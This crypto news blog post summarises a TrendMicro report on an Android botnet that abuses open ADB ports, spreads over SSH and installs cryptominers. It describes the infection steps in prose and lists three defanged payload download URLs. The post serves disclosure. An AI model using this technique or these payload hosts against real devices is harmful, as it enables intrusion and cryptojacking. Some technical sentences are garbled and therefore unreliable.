Report on the Latest Crypto Mining Malware Discovery by TrendMicro for Android Devices

Hackers have been going after the cryptocurrency market for as long as it has existed. Anonymous coins and other loopholes have made it possible for these bad players to get involved, and malware tends to be involved in many of these attacks. A new report from TrendMicro indicates that malware has now been discovered in an attack against some Android devices.

  • New malware botnet is hacking Android devices for mining.
  • Malware has evolved over time, and TrendMicro has found it in the past.

TrendMicro has found a new botnet that is going after Android smartphones and tablets. This botnet is going after the Debug Bridge ports on devices, despite being a system that is meant to fix the defects in different Android-based apps. The botnet malware, as it turns out, has already been found in 21 different countries, though the location that seems to be the most prevalent is in South Korea.

This new attack goes after the lack of authentication required by open ADB ports by default. After the malware is installed, it will expand to any system that the device has shared an SSH connection. These connections link many types of devices, which means that there are many products at risk.

The researchers with TrendMicro stated,

“Being a known device means the two systems can communicate with each other without any further authentication after the initial key exchange, each system considers the other as safe. The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections.”

The whole process begins as early as the first IP address, arriving through the ADB to update the working directory to a .tmp file with the command shell. After the bot determines that it has reached its destination, it uses a wget command, downloading the payload earned by three separate miners. The malware is programmed to decide which miner can exploit the infected device the best, based on the manufacturer, hardware, and other details.

Another command is executed to chance the permission settings, and the bot ends up concealing itself with another command that will hide it from the host, deleting the file that was downloaded. By deleting the file, the trail of where the bug came from in the first place, even though it continues to be used on other victims.

According to the researchers that examined the script used to invade these devices, there are three possible miners that could be used in the attack from the same URL:

  • http://198[.]98[.]51[.]104:282/x86/bash
  • http://198[.]98[.]51[.]104:282/arm/bash
  • http://198[.]98[.]51[.]104:282/aarch64/bash

In their research, TrendMicro also discovered that the host’s memory is enhanced if HugePages is enabled, since it enables any memory page that exceeds the default size. This change increases mining output. If there are already miners using it, the botnet tries to invalidate the URL, and they use the host code to kill them.

There are more and more ways that cryptocurrency mining drops are evolving, creating new ways to exploit the victims for personal gain. TrendMicro found another type of malware using the exploitation of ADBs that was called the Satoshi Variant.

To view the full report from TrendMicro, visit: here.

Get Free Email Updates!

*Action* Enter Best Email to Get Trending Crypto News & Bitcoin Market Updates

I will never give away, trade or sell your email address. You can unsubscribe at any time.

Krystle M
Krystle is an American cryptocurrency blogger that wants to see the future of crypto and blockchain technology evolve. She has been writing about cryptocurrency for about a year, with a special interest in blockchain technology and regulatory measures around the world. While away from writing and learning about the changes in the cryptocurrency industry, she likes to indulge in science fiction novels and further her experience in playing both guitar and piano.

[Alert] Use the author's self-conducted information at your own risk, do you own research, never invest more than you are willing to lose.

[Disclosure] The published news and content on BitcoinExchangeGuide should never be used or taken as financial investment advice. Understand trading cryptocurrencies is a very high-risk activity which can result in significant losses. Editorial Policy \\ Investment Disclaimer


Please enter your comment!
Please enter your name here


Live Bitcoin Price & Latest BTC Charts

Today's Latest Crypto News

Over 100k Bitcoin Worth Nearly $1.2 Billion Tokenized on Ethereum; WBTC & RenBTC Leading

The number of Bitcoins locked on Ethereum continues to hit new records. It has already surpassed $1 billion. Currently, nearly $1.2 billion worth of Bitcoin...

China Should Seize the ‘First Mover' Advantages of Launching A CBDC: PBoC

China should aim at becoming the first country to issue digital currency as part of its efforts to internationalize the yuan and lessen its...

These 2 DeFi Forks Take a Harsh Beating As The Originals Reclaim Their Dominance

Up until the mid of last week, Curve clone Swerve was enjoying a record $942 million in deposits, or total value locked (TVL), as...

Biggest Banks Involved in Moving $2 Trillion Illicit Funds, Reveals FinCEN Documents

And they say bitcoin is used for criminal activities. The leaked documents of $2 trillion transactions, a tiny proportion of the SARs submitted over the...

Binance Launches the ‘Innovation Zone' to Justify DeFi FOMO Listings

Leading spot exchange Binance has created an “Innovation Zone” to list newer tokens. "The team has created the Innovation Zone, which will allow users to...

BitcoinExchangeGuide is a hyper-active daily crypto news portal with care in cultivating the cryptocurrency culture with community contributors who help rewrite the bold future of blockchain finance. Subscribe on Google News, see the mission, authors, editorial links policy, investment disclaimer, privacy policy. Got News? Contact us, we are human too. Note: nothing here is financial advice, do your own research thoroughly.

Start Using Crypto Today